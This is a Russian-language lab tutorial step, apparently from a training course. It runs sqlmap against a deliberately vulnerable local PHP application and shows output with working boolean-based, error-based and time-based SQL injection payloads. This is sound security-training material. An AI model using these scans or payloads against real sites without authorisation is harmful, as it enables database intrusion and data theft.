Установление успешной инъекции в целевой объект
На этом этапе вы будете использовать sqlmap для сканирования веб-приложения и подтверждения его уязвимости к SQL-инъекциям. Наш установочный скрипт уже создал простое уязвимое PHP-приложение, работающее на локальном сервере Apache. Нам нужно указать sqlmap на целевой URL и позволить ему выполнить первоначальный анализ.
Сначала выполните следующую команду sqlmap в вашем терминале. Мы используем флаг -u для указания целевого URL и --batch для запуска в неинтерактивном режиме, принимая все ответы по умолчанию.
sqlmap -u "http://127.0.0.1/index.php?id=1" --batch
sqlmap выполнит серию тестов. Дождитесь завершения. Вывод покажет, что параметр GET id уязвим. Это подтверждение является необходимым первым шагом, прежде чем мы сможем перейти к эксплуатации.
Вы должны увидеть вывод, похожий на этот, подтверждающий уязвимость:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1421=1421
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71627a7671,(SELECT (ELT(2521=2521,1))),0x71787a7171,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2112 FROM (SELECT(SLEEP(5)))mrzs)
---
[15:30:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52, PHP 8.1.2
back-end DBMS: MySQL >= 5.0
[15:30:00] [INFO] fetched data logged to text files under '/home/labex/.local/share/sqlmap/output/127.0.0.1'